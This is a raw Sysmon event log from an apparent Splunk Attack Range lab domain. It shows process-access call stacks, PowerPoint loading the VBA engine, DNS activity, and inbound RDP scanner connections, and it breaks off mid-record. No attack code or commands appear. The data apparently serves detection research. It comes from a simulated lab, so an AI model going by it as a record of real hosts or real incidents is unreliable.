10341000x800000000000000081985Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:32.746{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EC54-607E-6C0F-00000000BB01}1204C:\Windows\system32\sppsvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081984Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:32.731{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC54-607E-6C0F-00000000BB01}1204C:\Windows\system32\sppsvc.exe0x103800C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081983Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:32.731{A7A01FEF-B624-607E-0A00-00000000BB01}8524336C:\Windows\system32\services.exe{A7A01FEF-EC54-607E-6C0F-00000000BB01}1204C:\Windows\system32\sppsvc.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081982Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:32.668{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081981Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:32.668{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081980Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:32.668{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-B624-607E-0A00-00000000BB01}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081979Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:32.668{A7A01FEF-C0A6-607E-8105-00000000BB01}8365152C:\Windows\Explorer.EXE{A7A01FEF-EC53-607E-6B0F-00000000BB01}3628C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62840|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081978Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:32.668{A7A01FEF-C0A6-607E-8105-00000000BB01}8365152C:\Windows\Explorer.EXE{A7A01FEF-EC53-607E-6B0F-00000000BB01}3628C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000081977Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:32.606{A7A01FEF-EC53-607E-6B0F-00000000BB01}3628C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\VBA\VBA7.1\VBE7.DLL7.01.1106Visual Basic Design Time EnvironmentVisual Basic EnvironmentMicrosoft Corporation-MD5=0890BD3163852EDB987433AB40631B2B,SHA256=99E6A1505418EA2B1AD84DE8E49D72DA4BD29822EAB088B6CB3ADBBF5EA6532B,IMPHASH=150029E984790C7A698A8E7E9FD2048AtrueMicrosoft CorporationValid 10341000x800000000000000081976Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:32.527{A7A01FEF-B626-607E-1600-00000000BB01}15401828C:\Windows\system32\svchost.exe{A7A01FEF-EC14-607E-470E-00000000BB01}2240C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+8d212|C:\Windows\system32\wbem\wmiprvsd.dll+8dfd1|C:\Windows\system32\wbem\wmiprvsd.dll+3b42f|C:\Windows\system32\wbem\wmiprvsd.dll+d4be|C:\Windows\system32\wbem\wbemcore.dll+2af4f|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081975Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:32.527{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081974Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:32.527{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081973Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:32.527{A7A01FEF-B624-607E-0B00-00000000BB01}8604604C:\Windows\system32\lsass.exe{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081972Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:32.512{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EC53-607E-6B0F-00000000BB01}3628C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081971Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:32.496{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EC53-607E-6B0F-00000000BB01}3628C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081970Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:32.496{A7A01FEF-B626-607E-1100-00000000BB01}11762044C:\Windows\system32\svchost.exe{A7A01FEF-EC53-607E-6B0F-00000000BB01}3628C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081969Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:32.496{A7A01FEF-C0A6-607E-7B05-00000000BB01}18804408C:\Windows\system32\taskhostw.exe{A7A01FEF-EC53-607E-6B0F-00000000BB01}3628C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081968Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:32.496{A7A01FEF-C0A6-607E-7B05-00000000BB01}18804408C:\Windows\system32\taskhostw.exe{A7A01FEF-EC53-607E-6B0F-00000000BB01}3628C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081967Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:32.481{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000081966Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:32.434{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D5F5DE9F86118F27B40E64360F9B86A7,SHA256=E337B90A4D6B8704C3BB878226F06CBC6EC81C742EFA839A5C48742C4784EDFE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081965Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:32.387{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EC53-607E-6B0F-00000000BB01}3628C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081964Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:32.371{A7A01FEF-B624-607E-0B00-00000000BB01}8604604C:\Windows\system32\lsass.exe{A7A01FEF-EC53-607E-6B0F-00000000BB01}3628C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081963Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:32.371{A7A01FEF-B624-607E-0B00-00000000BB01}8604604C:\Windows\system32\lsass.exe{A7A01FEF-EC53-607E-6B0F-00000000BB01}3628C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081962Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:32.215{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EC53-607E-6B0F-00000000BB01}3628C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081961Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:32.215{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EC53-607E-6B0F-00000000BB01}3628C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081960Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:32.215{A7A01FEF-B626-607E-1600-00000000BB01}15406976C:\Windows\system32\svchost.exe{A7A01FEF-EC53-607E-6B0F-00000000BB01}3628C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081959Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:32.215{A7A01FEF-B626-607E-1600-00000000BB01}15401640C:\Windows\system32\svchost.exe{A7A01FEF-EC53-607E-6B0F-00000000BB01}3628C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000081958Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:30.628{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com60036-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000081957Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:30.251{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-23584-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000081956Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:29.967{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-63995- 354300x800000000000000081955Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:29.936{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53443- 354300x800000000000000081954Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:29.936{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local63995- 23542300x800000000000000050803Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:32.824{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC42CAD73712A3F71DF7D7C64AE12FE7,SHA256=93D26AA79EC1513D6F2F3DD601B03B64DE0A947D4C23F2DECDA3DD3C94298380,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000082040Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:33.981{A7A01FEF-EC53-607E-6B0F-00000000BB01}36286052C:\Program Files\Microsoft 